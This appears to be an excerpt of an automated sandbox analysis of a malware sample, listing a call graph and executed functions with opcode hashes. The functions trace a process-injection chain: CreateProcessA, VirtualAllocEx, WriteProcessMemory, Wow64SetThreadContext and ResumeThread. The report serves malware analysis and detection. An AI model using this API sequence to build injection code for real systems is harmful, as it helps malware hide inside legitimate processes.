72715e5 28953->29035 29039 72715f0 28953->29039 28962 727429d 28960->28962 28961 72746c0 28961->28897 28962->28961 28964 7271361 WriteProcessMemory 28962->28964 28965 7271368 WriteProcessMemory 28962->28965 28963 7274122 28963->28897 28964->28963 28965->28963 29043 7270960 28966->29043 29047 727095a 28966->29047 28967 72740ec 28967->28897 28971 727401e 28970->28971 28972 7274865 28971->28972 28973 7271361 WriteProcessMemory 28971->28973 28974 7271368 WriteProcessMemory 28971->28974 28972->28897 28973->28971 28974->28971 28976 7274079 28975->28976 28977 72741c9 28976->28977 29051 72708b0 28976->29051 29055 72708aa 28976->29055 28977->28897 28981 7274491 28980->28981 28982 727408a 28981->28982 28986 7270960 Wow64SetThreadContext 28981->28986 28987 727095a Wow64SetThreadContext 28981->28987 28982->28897 28983 72741c9 28982->28983 28984 72708b0 ResumeThread 28982->28984 28985 72708aa ResumeThread 28982->28985 28983->28897 28984->28982 28985->28982 28986->28982 28987->28982 28989 727449e 28988->28989 28990 727408a 28988->28990 28992 7270960 Wow64SetThreadContext 28989->28992 28993 727095a Wow64SetThreadContext 28989->28993 28990->28897 28991 72741c9 28990->28991 28994 72708b0 ResumeThread 28990->28994 28995 72708aa ResumeThread 28990->28995 28991->28897 28992->28990 28993->28990 28994->28990 28995->28990 29059 7271450 28996->29059 29063 7271458 28996->29063 28997 727401e 28998 727445b 28997->28998 29001 7271361 WriteProcessMemory 28997->29001 29002 7271368 WriteProcessMemory 28997->29002 28998->28897 29001->28997 29002->28997 29004 727401e 29003->29004 29004->29003 29005 7274865 29004->29005 29006 7271361 WriteProcessMemory 29004->29006 29007 7271368 WriteProcessMemory 29004->29007 29005->28897 29006->29004 29007->29004 29009 727445b 29008->29009 29010 727401e 29008->29010 29009->28897 29011 7274865 29010->29011 29012 7271361 WriteProcessMemory 29010->29012 29013 7271368 WriteProcessMemory 29010->29013 29011->28897 29012->29010 29013->29010 29015 727428c 29014->29015 29017 7271361 WriteProcessMemory 29015->29017 29018 7271368 WriteProcessMemory 29015->29018 29016 7274122 29016->28897 29017->29016 29018->29016 29020 72712e8 VirtualAllocEx 29019->29020 29022 7271325 29020->29022 29022->28945 29024 72712e8 VirtualAllocEx 29023->29024 29026 7271325 29024->29026 29026->28945 29028 72713b0 WriteProcessMemory 29027->29028 29030 7271407 29028->29030 29030->28950 29032 72713b0 WriteProcessMemory 29031->29032 29034 7271407 29032->29034 29034->28950 29036 7271679 CreateProcessA 29035->29036 29038 727183b 29036->29038 29040 7271679 CreateProcessA 29039->29040 29042 727183b 29040->29042 29044 72709a5 Wow64SetThreadContext 29043->29044 29046 72709ed 29044->29046 29046->28967 29048 72709a5 Wow64SetThreadContext 29047->29048 29050 72709ed 29048->29050 29050->28967 29052 72708f0 ResumeThread 29051->29052 29054 7270921 29052->29054 29054->28976 29056 72708f0 ResumeThread 29055->29056 29058 7270921 29056->29058 29058->28976 29060 72714a3 ReadProcessMemory 29059->29060 29062 72714e7 29060->29062 29062->28997 29064 72714a3 ReadProcessMemory 29063->29064 29066 72714e7 29064->29066 29066->28997 28881 7274cb0 28882 7274e3b 28881->28882 28883 7274cd6 28881->28883 28883->28882 28885 7273230 28883->28885 28886 7274f30 PostMessageW 28885->28886 28887 7274f9c 28886->28887 28887->28883 29067 54279e5 29069 54279ef 29067->29069 29068 5427a0e 29069->29068 29070 54299fb 29069->29070 29071 5429a3d 29069->29071 29077 5427648 29070->29077 29074 5429a52 29071->29074 29082 2cd6384 29071->29082 29089 2cd86b8 29071->29089 29073 5429a1f 29078 5427653 29077->29078 29079 5429a52 29078->29079 29080 2cd86b8 3 API calls 29078->29080 29081 2cd6384 3 API calls 29078->29081 29079->29073 29080->29079 29081->29079 29083 2cd638f 29082->29083 29085 2cd898b 29083->29085 29096 2cdb041 29083->29096 29084 2cd89c9 29084->29074 29085->29084 29100 2cdd130 29085->29100 29105 2cdd122 29085->29105 29090 2cd86bd 29089->29090 29092 2cd898b 29090->29092 29093 2cdb041 GetModuleHandleW 29090->29093 29091 2cd89c9 29091->29074 29092->29091 29094 2cdd130 3 API calls 29092->29094 29095 2cdd122 3 API calls 29092->29095 29093->29092 29094->29091 29095->29091 29110 2cdb05f 29096->29110 29113 2cdb070 29096->29113 29097 2cdb04e 29097->29085 29102 2cdd13b 29100->29102 29101 2cdd175 29101->29084 29102->29101 29121 2cdd6e8 29102->29121 29125 2cdd6d8 29102->29125 29107 2cdd12e 29105->29107 29106 2cdd175 29106->29084 29107->29106 29108 2cdd6d8 3 API calls 29107->29108 29109 2cdd6e8 3 API calls 29107->29109 29108->29106 29109->29106 29116 2cdb159 29110->29116 29111 2cdb07f 29111->29097 29114 2cdb07f 29113->29114 29115 2cdb159 GetModuleHandleW 29113->29115 29114->29097 29115->29114 29117 2cdb19c 29116->29117 29118 2cdb179 29116->29118 29117->29111 29118->29117 29119 2cdb3a0 GetModuleHandleW 29118->29119 29120 2cdb3cd 29119->29120 29120->29111 29122 2cdd6f5 29121->29122 29123 2cdd72f 29122->29123 29129 2cdd2d4 29122->29129 29123->29101 29126 2cdd6dd 29125->29126 29127 2cdd72f 29126->29127 29128 2cdd2d4 3 API calls 29126->29128 29127->29101 29128->29127 29130 2cdd2df 29129->29130 29132 2cde040 29130->29132 29133 2cdd3fc 29130->29133 29132->29132 29134 2cdd407 29133->29134 29135 2cd6384 3 API calls 29134->29135 29136 2cde0af 29135->29136 29140 5420040 29136->29140 29146 5420006 29136->29146 29137 2cde0e9 29137->29132 29142 5420071 29140->29142 29143 5420171 29140->29143 29141 542007d 29141->29137 29142->29141 29152 5420e88 29142->29152 29157 5420e98 29142->29157 29143->29137 29147 5420071 29146->29147 29149 5420171 29146->29149 29148 542007d 29147->29148 29150 5420e88 2 API calls 29147->29150 29151 5420e98 2 API calls 29147->29151 29148->29137 29149->29137 29150->29149 29151->29149 29154 5420ec3 29152->29154 29153 5420f72 29153->29153 29154->29153 29162 5421d80 29154->29162 29166 5421d31 29154->29166 29158 5420ec3 29157->29158 29159 5420f72 29158->29159 29160 5421d80 2 API calls 29158->29160 29161 5421d31 2 API calls 29158->29161 29160->29159 29161->29159 29163 5421db5 29162->29163 29165 5421d31 2 API calls 29162->29165 29174 5421dd0 29162->29174 29163->29153 29165->29163 29167 5421d86 29166->29167 29168 5421dbe CreateWindowExW 29166->29168 29172 5421dd0 CreateWindowExW 29167->29172 29173 5421d31 CreateWindowExW 29167->29173 29171 5421ef4 29168->29171 29169 5421db5 29169->29153 29171->29171 29172->29169 29173->29169 29175 5421e38 CreateWindowExW 29174->29175 29177 5421ef4 29175->29177 29177->29177 29234 54278ba 29235 54278c4 29234->29235 29240 5427498 GetModuleHandleW CreateWindowExW CreateWindowExW 29235->29240 29237 542783f 29238 5427844 29237->29238 29239 5427498 GetModuleHandleW CreateWindowExW CreateWindowExW 29237->29239 29238->29238 29239->29237 29240->29237 29178 135d01c 29179 135d034 29178->29179 29180 135d08e 29179->29180 29185 5422ce9 29179->29185 29190 5421f88 29179->29190 29195 5421f78 29179->29195 29200 5422cf8 29179->29200 29186 5422d25 29185->29186 29187 5422d57 29186->29187 29205 5423278 29186->29205 29210 5423288 29186->29210 29191 5421fae 29190->29191 29193 5422cf8 2 API calls 29191->29193 29194 5422ce9 2 API calls 29191->29194 29192 5421fcf 29192->29180 29193->29192 29194->29192 29196 5421fae 29195->29196 29198 5422cf8 2 API calls 29196->29198 29199 5422ce9 2 API calls 29196->29199 29197 5421fcf 29197->29180 29198->29197 29199->29197 29201 5422d25 29200->29201 29202 5422d57 29201->29202 29203 5423278 2 API calls 29201->29203 29204 5423288 2 API calls 29201->29204 29203->29202 29204->29202 29207 5423288 29205->29207 29206 5423328 29206->29187 29215 5423340 29207->29215 29218 5423330 29207->29218 29212 542329c 29210->29212 29211 5423328 29211->29187 29213 5423340 2 API calls 29212->29213 29214 5423330 2 API calls 29212->29214 29213->29211 29214->29211 29216 5423351 29215->29216 29222 5424501 29215->29222 29216->29206 29219 5423340 29218->29219 29220 5423351 29219->29220 29221 5424501 2 API calls 29219->29221 29220->29206 29221->29220 29226 5424530 29222->29226 29230 5424521 29222->29230 29223 542451a 29223->29216 29227 5424572 29226->29227 29229 5424579 29226->29229 29228 54245ca CallWindowProcW 29227->29228 29227->29229 29228->29229 29229->29223 29231 5424530 29230->29231 29232 54245ca CallWindowProcW 29231->29232 29233 5424579 29231->29233 29232->29233 29233->29223 28867 2cdd800 28868 2cdd846 28867->28868 28872 2cdd9cf 28868->28872 28875 2cdd9e0 28868->28875 28869 2cdd933 28878 2cdd39c 28872->28878 28876 2cdda0e 28875->28876 28877 2cdd39c DuplicateHandle 28875->28877 28876->28869 28877->28876 28879 2cdda48 DuplicateHandle 28878->28879 28880 2cdda0e 28879->28880 28880->28869

                                        Executed Functions

                                        Function 05421D31 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 843 5421d31-5421d84 844 5421d86-5421dad 843->844 845 5421dbe-5421e36 843->845 860 5421db0 call 5421dd0 844->860 861 5421db0 call 5421d31 844->861 846 5421e41-5421e48 845->846 847 5421e38-5421e3e 845->847 848 5421e53-5421ef2 CreateWindowExW 846->848 849 5421e4a-5421e50 846->849 847->846 852 5421ef4-5421efa 848->852 853 5421efb-5421f33 848->853 849->848 850 5421db5-5421db6 852->853 857 5421f40 853->857 858 5421f35-5421f38 853->858 859 5421f41 857->859 858->857 859->859 860->850 861->850
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05421EE2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1987546993.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_5420000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 4a207d1a3bca50bd5a3a6ea520dbe18e8b82517d6576c0233e8ad475ba2d3aa0
                                        • Instruction ID: c6dae0d20d49a7d4b89ec538be3c1e895da484c51688e62feb66c89b343281ea
                                        • Opcode Fuzzy Hash: 4a207d1a3bca50bd5a3a6ea520dbe18e8b82517d6576c0233e8ad475ba2d3aa0
                                        • Instruction Fuzzy Hash: F06112B2C00259EFDF01CFA9C980ADEBFB2BF48350F15916AE818AB260D7759945CF50
                                        Function 0727095A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 592 727095a-72709ab 594 72709ad-72709b9 592->594 595 72709bb-72709eb Wow64SetThreadContext 592->595 594->595 597 72709f4-7270a24 595->597 598 72709ed-72709f3 595->598 598->597
                                        APIs
                                        • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 072709DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID: W
                                        • API String ID: 983334009-655174618
                                        • Opcode ID: 82f362168dbc618de80577ae0cb0ecee6e2ada3784a3e3e4897f3baeda8adb82
                                        • Instruction ID: 639a8d0c05f12d95a0a529853ce56b3f91cf14465e1664482cd5cd567d4f63d8
                                        • Opcode Fuzzy Hash: 82f362168dbc618de80577ae0cb0ecee6e2ada3784a3e3e4897f3baeda8adb82
                                        • Instruction Fuzzy Hash: DB2118B1900209CFDB10DFA9C5857EEBBF4AF48364F14842AD499A7241CB789A85CF94
                                        Function 072715E5 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 671 72715e5-7271685 673 7271687-7271691 671->673 674 72716be-72716de 671->674 673->674 675 7271693-7271695 673->675 679 7271717-7271746 674->679 680 72716e0-72716ea 674->680 677 7271697-72716a1 675->677 678 72716b8-72716bb 675->678 681 72716a5-72716b4 677->681 682 72716a3 677->682 678->674 690 727177f-7271839 CreateProcessA 679->690 691 7271748-7271752 679->691 680->679 683 72716ec-72716ee 680->683 681->681 684 72716b6 681->684 682->681 685 7271711-7271714 683->685 686 72716f0-72716fa 683->686 684->678 685->679 688 72716fe-727170d 686->688 689 72716fc 686->689 688->688 692 727170f 688->692 689->688 702 7271842-72718c8 690->702 703 727183b-7271841 690->703 691->690 693 7271754-7271756 691->693 692->685 695 7271779-727177c 693->695 696 7271758-7271762 693->696 695->690 697 7271766-7271775 696->697 698 7271764 696->698 697->697 699 7271777 697->699 698->697 699->695 713 72718ca-72718ce 702->713 714 72718d8-72718dc 702->714 703->702 713->714 717 72718d0 713->717 715 72718de-72718e2 714->715 716 72718ec-72718f0 714->716 715->716 718 72718e4 715->718 719 72718f2-72718f6 716->719 720 7271900-7271904 716->720 717->714 718->716 719->720 721 72718f8 719->721 722 7271916-727191d 720->722 723 7271906-727190c 720->723 721->720 724 7271934 722->724 725 727191f-727192e 722->725 723->722 726 7271935 724->726 725->724 726->726
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07271826
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: a01a4f5770fc08a632edde98aa2a03a03a05050ad3308984195a19461e4158f5
                                        • Instruction ID: 35888ad1df6626165f0c6373d223591e5c88e88a60f713d0ae6109c7037bdc36
                                        • Opcode Fuzzy Hash: a01a4f5770fc08a632edde98aa2a03a03a05050ad3308984195a19461e4158f5
                                        • Instruction Fuzzy Hash: 52A15EB1D1021EDFDB10CF68C9417DDBBB6BF88314F1481A9E848A7250DB749995CF92
                                        Function 072715F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 728 72715f0-7271685 730 7271687-7271691 728->730 731 72716be-72716de 728->731 730->731 732 7271693-7271695 730->732 736 7271717-7271746 731->736 737 72716e0-72716ea 731->737 734 7271697-72716a1 732->734 735 72716b8-72716bb 732->735 738 72716a5-72716b4 734->738 739 72716a3 734->739 735->731 747 727177f-7271839 CreateProcessA 736->747 748 7271748-7271752 736->748 737->736 740 72716ec-72716ee 737->740 738->738 741 72716b6 738->741 739->738 742 7271711-7271714 740->742 743 72716f0-72716fa 740->743 741->735 742->736 745 72716fe-727170d 743->745 746 72716fc 743->746 745->745 749 727170f 745->749 746->745 759 7271842-72718c8 747->759 760 727183b-7271841 747->760 748->747 750 7271754-7271756 748->750 749->742 752 7271779-727177c 750->752 753 7271758-7271762 750->753 752->747 754 7271766-7271775 753->754 755 7271764 753->755 754->754 756 7271777 754->756 755->754 756->752 770 72718ca-72718ce 759->770 771 72718d8-72718dc 759->771 760->759 770->771 774 72718d0 770->774 772 72718de-72718e2 771->772 773 72718ec-72718f0 771->773 772->773 775 72718e4 772->775 776 72718f2-72718f6 773->776 777 7271900-7271904 773->777 774->771 775->773 776->777 778 72718f8 776->778 779 7271916-727191d 777->779 780 7271906-727190c 777->780 778->777 781 7271934 779->781 782 727191f-727192e 779->782 780->779 783 7271935 781->783 782->781 783->783
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07271826
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 0d0314c20f165679a543a9cc2d6a6309672f112034d48e9a215b12454e114731
                                        • Instruction ID: e1951d44f8794fce6747263c806d8d5ecee0f43b35853638f1c8287fe89fffc7
                                        • Opcode Fuzzy Hash: 0d0314c20f165679a543a9cc2d6a6309672f112034d48e9a215b12454e114731
                                        • Instruction Fuzzy Hash: 5A916DB1D1021EDFEB10CF68C941BDDBBB6BF88314F1481A9E848A7240DB749995CF92
                                        Function 02CDB159 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 785 2cdb159-2cdb177 786 2cdb179-2cdb186 call 2cda4e0 785->786 787 2cdb1a3-2cdb1a7 785->787 794 2cdb19c 786->794 795 2cdb188 786->795 788 2cdb1a9-2cdb1b3 787->788 789 2cdb1bb-2cdb1fc 787->789 788->789 796 2cdb1fe-2cdb206 789->796 797 2cdb209-2cdb217 789->797 794->787 841 2cdb18e call 2cdb3f0 795->841 842 2cdb18e call 2cdb400 795->842 796->797 798 2cdb219-2cdb21e 797->798 799 2cdb23b-2cdb23d 797->799 803 2cdb229 798->803 804 2cdb220-2cdb227 call 2cda4ec 798->804 802 2cdb240-2cdb247 799->802 800 2cdb194-2cdb196 800->794 801 2cdb2d8-2cdb398 800->801 836 2cdb39a-2cdb39d 801->836 837 2cdb3a0-2cdb3cb GetModuleHandleW 801->837 806 2cdb249-2cdb251 802->806 807 2cdb254-2cdb25b 802->807 805 2cdb22b-2cdb239 803->805 804->805 805->802 806->807 809 2cdb25d-2cdb265 807->809 810 2cdb268-2cdb271 call 2cda4fc 807->810 809->810 816 2cdb27e-2cdb283 810->816 817 2cdb273-2cdb27b 810->817 818 2cdb285-2cdb28c 816->818 819 2cdb2a1-2cdb2ae 816->819 817->816 818->819 821 2cdb28e-2cdb29e call 2cda50c call 2cda51c 818->821 825 2cdb2d1-2cdb2d7 819->825 826 2cdb2b0-2cdb2ce 819->826 821->819 826->825 836->837 838 2cdb3cd-2cdb3d3 837->838 839 2cdb3d4-2cdb3e8 837->839 838->839 841->800 842->800
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDB3BE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: fb0e57e2483d7af6e560b818fdf3a48975b3dd059fecd0b91b94629ebd57d6a2
                                        • Instruction ID: bcb7e6cd070852112ed76332752b3ebe06cf552bc8f2a5f8da95f7a137d903b2
                                        • Opcode Fuzzy Hash: fb0e57e2483d7af6e560b818fdf3a48975b3dd059fecd0b91b94629ebd57d6a2
                                        • Instruction Fuzzy Hash: 1A812271A00B058FD724DF6AD54575ABBF1FF88308F008A2DD58ADBA50DB34E945CB90
                                        Function 05421DD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 862 5421dd0-5421e36 863 5421e41-5421e48 862->863 864 5421e38-5421e3e 862->864 865 5421e53-5421ef2 CreateWindowExW 863->865 866 5421e4a-5421e50 863->866 864->863 868 5421ef4-5421efa 865->868 869 5421efb-5421f33 865->869 866->865 868->869 873 5421f40 869->873 874 5421f35-5421f38 869->874 875 5421f41 873->875 874->873 875->875
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05421EE2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1987546993.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_5420000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 55869695bc4323d4b03bcc0514a2ac8fd6d3765f8417343a2a0c19f6e211c96c
                                        • Instruction ID: 414a6a89ed6dc1f0924840d822a694bf496e94722673f4ee1368ac2ef52190b9
                                        • Opcode Fuzzy Hash: 55869695bc4323d4b03bcc0514a2ac8fd6d3765f8417343a2a0c19f6e211c96c
                                        • Instruction Fuzzy Hash: B441BEB1D00359DFDB14CFA9C884ADEBBB5BF48310F64812AE819AB214D771A885CF91
                                        Function 02CD49D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 876 2cd49d4-2cd5f41 CreateActCtxA 879 2cd5f4a-2cd5fa4 876->879 880 2cd5f43-2cd5f49 876->880 887 2cd5fa6-2cd5fa9 879->887 888 2cd5fb3-2cd5fb7 879->888 880->879 887->888 889 2cd5fb9-2cd5fc5 888->889 890 2cd5fc8 888->890 889->890 892 2cd5fc9 890->892 892->892
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02CD5F31
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: ea34191b73b27736b86c344cd64a3bafee640c5ff9d8f3e4fbed54d0367c64ae
                                        • Instruction ID: cf5ebd3ca17459d9ce45ba2fb2afd619673ef4b815ff89ce396b7c11f55e5ffb
                                        • Opcode Fuzzy Hash: ea34191b73b27736b86c344cd64a3bafee640c5ff9d8f3e4fbed54d0367c64ae
                                        • Instruction Fuzzy Hash: 2B41EFB0C00619CADB24CFA9C884B9EBBF5BF88304F60806AD408AB255DB756945CF91
                                        Function 02CD5E75 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 893 2cd5e75-2cd5e7b 894 2cd5e80-2cd5f41 CreateActCtxA 893->894 896 2cd5f4a-2cd5fa4 894->896 897 2cd5f43-2cd5f49 894->897 904 2cd5fa6-2cd5fa9 896->904 905 2cd5fb3-2cd5fb7 896->905 897->896 904->905 906 2cd5fb9-2cd5fc5 905->906 907 2cd5fc8 905->907 906->907 909 2cd5fc9 907->909 909->909
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02CD5F31
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 7dd9aaaf7543900e830cbcdb49a5ae7b4664987eda24ed0cfaa1b7ddb42e8dd1
                                        • Instruction ID: 010c032dc4c4e9051dd661991c03682d7f1cdf0931c286e0fd3db69923234348
                                        • Opcode Fuzzy Hash: 7dd9aaaf7543900e830cbcdb49a5ae7b4664987eda24ed0cfaa1b7ddb42e8dd1
                                        • Instruction Fuzzy Hash: 9C41DFB0C00619CADB24CFA9C984B9EBBF5FF49304F64806AD408AB255DB756945CF91
                                        Function 05424530 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 910 5424530-542456c 911 5424572-5424577 910->911 912 542461c-542463c 910->912 913 54245ca-5424602 CallWindowProcW 911->913 914 5424579-54245b0 911->914 918 542463f-542464c 912->918 916 5424604-542460a 913->916 917 542460b-542461a 913->917 920 54245b2-54245b8 914->920 921 54245b9-54245c8 914->921 916->917 917->918 920->921 921->918
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 054245F1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1987546993.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_5420000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 9e76bb4f29a121090623ba2ee6b4715cb5e2a968495fa011f900f57bb7d5294c
                                        • Instruction ID: 782f2739c4f456604fb166751f3c70cf6aec954459a5ae8943605901dd75410e
                                        • Opcode Fuzzy Hash: 9e76bb4f29a121090623ba2ee6b4715cb5e2a968495fa011f900f57bb7d5294c
                                        • Instruction Fuzzy Hash: 5B4118B8900215CFCB14CF99C488AAABBF5FB88314F24C45DE559AB321D775A841CFA0
                                        Function 07271361 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072713F8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 537e2ecffbf9c1f6b82e254b1fd3d357f0e9808a0783b4b9ed39d768eb27ad03
                                        • Instruction ID: 328003aef4ae2457ad38fc2cbf18cd03ef59e689bb1ea7365b36dee255e91082
                                        • Opcode Fuzzy Hash: 537e2ecffbf9c1f6b82e254b1fd3d357f0e9808a0783b4b9ed39d768eb27ad03
                                        • Instruction Fuzzy Hash: 222157B1900359DFDB10CFA9C980BEEBBF1FF88310F10842AE959A7250D7789954CBA4
                                        Function 07271368 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072713F8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: fda9f0952b11bfe44130721cb4da7d9179427204fbded5db73e31bc7b2fee004
                                        • Instruction ID: 74bfe8883b152823a7b4cf94843a898f7154228c3adaaabf8fb2a040c3e96fd2
                                        • Opcode Fuzzy Hash: fda9f0952b11bfe44130721cb4da7d9179427204fbded5db73e31bc7b2fee004
                                        • Instruction Fuzzy Hash: 692155B190035D9FCB10CFAAC981BDEBBF5FF88310F10842AE959A7240D7789954CBA4
                                        Function 07271450 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072714D8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 2d2119d888cf6edba43a20d2ef3f73008f070b910a4122f763e1a829be0344a2
                                        • Instruction ID: c6a403fa5faf08c5c2557efd567e9d96ce1f99efcefe06c6489f942a3d70366a
                                        • Opcode Fuzzy Hash: 2d2119d888cf6edba43a20d2ef3f73008f070b910a4122f763e1a829be0344a2
                                        • Instruction Fuzzy Hash: 5B2136B1900259DFCB10DFAAC981BEEBBF1FF48310F10842AE958A7250D7789955CFA4
                                        Function 02CDD39C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CDDA0E,?,?,?,?,?), ref: 02CDDACF
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 3cd02eadc631dd4182c317d1e0001a33f9b76807b46b250d1bffe64abbfd3460
                                        • Instruction ID: 9408acb877a9dc14d313d44dfd3170713f60da893095390c0e44f3db509f251c
                                        • Opcode Fuzzy Hash: 3cd02eadc631dd4182c317d1e0001a33f9b76807b46b250d1bffe64abbfd3460
                                        • Instruction Fuzzy Hash: E521E3B5D002499FDB10CFAAD584ADEBFF4FB48310F14801AE959A7310D374A950CFA4
                                        Function 07271458 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072714D8
                                        Memory Dump Source
